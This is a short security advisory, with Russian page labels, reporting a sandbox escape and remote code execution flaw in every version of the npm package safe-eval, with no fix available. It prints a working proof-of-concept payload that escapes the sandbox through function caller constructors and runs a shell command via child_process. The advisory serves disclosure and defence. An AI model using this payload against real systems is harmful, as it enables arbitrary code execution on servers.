Описание
Sandbox Breakout / Arbitrary Code Execution in safe-eval
All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.
For example, the payload
((() => {
const targetKey = Object.keys(this)[0];
Object.defineProperty(this, targetKey, {
get: function() {
return arguments.callee.caller.constructor(
"return global.process.mainModule.require('child_process').execSync('pwd').toString()"
)();
}
});
})();```
may be used to print the `pwd` to the console.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
Пакеты
Наименование
safe-eval
npm
Затронутые версииВерсия исправления
>= 0.0.0
Отсутствует